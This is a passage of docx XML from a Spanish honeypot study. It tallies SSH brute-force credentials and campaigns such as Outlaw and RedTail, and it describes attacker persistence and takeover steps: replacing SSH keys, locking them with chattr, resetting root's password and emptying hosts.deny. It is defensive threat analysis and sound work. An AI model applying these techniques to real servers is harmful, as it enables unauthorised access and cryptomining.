        <w:t xml:space="preserve">El caso de Países Bajos se explica por una única campaña: 15 IPs consecutivas del rango 109.160.32.0/24, de un mismo proveedor de hosting, generan el 61,9 % de todas las conexiones del periodo (8 517). Probaron 8 491 combinaciones de usuario y contraseña sin repetir ninguna, repartiendo un diccionario entre las 15 direcciones para no superar umbrales de bloqueo por IP. Solo consiguieron entrar 9 veces y nunca ejecutaron comandos: su función es recolectar credenciales válidas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Credenciales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El usuario más probado es root (1 860 intentos), seguido de admin, user, ubuntu y cuentas de servicios habituales (postgres, oracle, hadoop). Las contraseñas confirman el uso de diccionarios de credenciales triviales: 123456, 1234, admin, password y la contraseña vacía (98 intentos). Destaca la cadena 345gs5662d34 y su variante 3245gs5662d34, usadas 758 veces desde 93 IPs distintas: no es una contraseña que se intente adivinar, sino un valor fijo característico de una familia concreta de bots.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Contraseñas más probadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="31813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181350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Campañas Identificadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los comandos y ficheros capturados permiten reconocer campañas documentadas públicamente. Los ficheros se identifican por su hash SHA-256, que es el indicador de compromiso que se compartiría con otros equipos de seguridad.</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349"/>
        <w:gridCol w:w="3016"/>
        <w:gridCol w:w="1349"/>
        <w:gridCol w:w="2223"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Campaña</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Alcance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Objetivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Botnet Outlaw (Dota)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sustituye ~/.ssh por una clave propia con el comentario «mdrfckr» y la bloquea con chattr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">396 sesiones, 97 IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistencia: acceso permanente aunque se cambie la contraseña</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RedTail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sube por SFTP setup.sh, clean.sh y el minero para cinco arquitecturas (x86_64, i686, ARMv7, ARMv8, RISC-V)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Minería de criptomonedas con los recursos del servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comprobación de honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Script «filter» que analiza cómo responde la shell y recoge CPU, núcleos, GPU e historial de accesos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">203 sesiones, 12 IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Decidir si la máquina es real y útil para minar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Toma de control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">chpasswd sobre root; vaciado de /etc/hosts.deny y eliminación de procesos ajenos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15 y 14 sesiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Expulsar al administrador y a otros intrusos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Uso como proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Peticiones de reenvío TCP, sobre todo hacia una IP en el puerto 2535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">56 sesiones, 5 IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ocultar el origen real del tráfico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Búsqueda de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rutas de sesiones de Telegram Desktop y de módems y pasarelas SMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 sesiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Robo de cuentas o envío de SMS fraudulentos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 17. Campañas y comportamientos identificados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La campaña de Outlaw es la más extendida: 97 IPs distintas repiten exactamente la misma secuencia de comandos, lo que indica una botnet ya consolidada que se propaga desde los equipos que infecta. Outlaw es una botnet de minería de Monero que entra por credenciales SSH débiles y cuyos scripts eliminan los mineros de la competencia (Souza et al., 2025). RedTail también es un minero, documentado por el SANS Internet Storm Center con exactamente el mismo conjunto de ficheros: un setup.sh que detecta la arquitectura de la víctima y ejecuta el binario correspondiente, además de instalar una clave SSH para garantizar la persistencia (Riley, 2024). En los datos del proyecto, el comando que acompaña a la subida incluye, efectivamente, la escritura de una clave en authorized_keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La comprobación de honeypot tiene una lectura directa para el proyecto: los atacantes también analizan el sistema al que acceden, y un honeypot de media interacción como Cowrie tiene límites para superar esas pruebas. Es una de las líneas de mejora recogidas en Trabajos Futuros.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El clasificador asignó la actividad a 21 técnicas de 9 tácticas. La Tabla 18 resume las más relevantes de cada táctica y la Figura 8 muestra todas ellas por número de sesiones.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064"/>
        <w:gridCol w:w="4604"/>
        <w:gridCol w:w="1270"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Táctica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Técnica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sesiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
